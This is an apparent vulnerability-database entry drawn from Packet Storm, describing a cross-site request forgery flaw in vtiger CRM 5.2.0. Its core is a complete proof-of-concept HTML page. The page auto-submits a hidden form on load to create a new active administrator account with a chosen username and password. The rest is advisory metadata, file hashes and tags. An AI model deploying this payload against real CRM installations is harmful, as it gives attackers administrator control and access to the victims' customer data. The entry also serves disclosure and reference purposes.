Sign-up

ID

VAR-E-201005-1525


TITLE

vtiger CRM 5.2.0 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 89822

DESCRIPTION

vtiger CRM version 5.2.0 cross site request forgery exploit.

Trust: 0.5

sources: PACKETSTORM: 89822

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:5.2.0

Trust: 0.5

sources: PACKETSTORM: 89822

EXPLOIT

<!--=========================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Cross-site Request Forgery #
# Software.................vtiger CRM 5.2.0 #
# Download.................http://sourceforge.net/projects/vtigercrm/files/ #
# Date.....................5/21/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. #
# The form values can also be sent via GET request, but the resulting user does not have admin privileges. #
# #
# #
# ##Proof of Concept## -->
<html>
<body onload="document.forms[0].submit()">
<form name="EditView" method="post" action="http://localhost/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="new_user" />
<input type="hidden" name="is_admin" value="on" />
<input type="hidden" name="user_password" value="new_password" />
<input type="hidden" name="confirm_password" value="new_password" />
<input type="hidden" name="email1" value="test@test.com" />
<input type="hidden" name="status" value="Active" />
</form>
</body>
</html>

Trust: 0.5

sources: PACKETSTORM: 89822

EXPLOIT HASH

LOCAL

SOURCE

md5: 6c9bb05a6748b2a1ab330425b96b4fa5
sha-1: 30dbc2f82f84f7740b2ff63ade59754c15925d28
sha-256: c059ad8297a297d821f25b04a3f044e11bd8ab9aeb6085809dedda0583cecb55
md5: 6c9bb05a6748b2a1ab330425b96b4fa5

Trust: 0.5

sources: PACKETSTORM: 89822

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 89822

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 89822

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 89822

CREDITS

AutoSec Tools

Trust: 0.5

sources: PACKETSTORM: 89822

EXTERNAL IDS

db:PACKETSTORMid:89822

Trust: 0.5

sources: PACKETSTORM: 89822

SOURCES

db:PACKETSTORMid:89822

LAST UPDATE DATE

2022-07-27T09:59:19.699000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:89822date:2010-05-22T19:02:37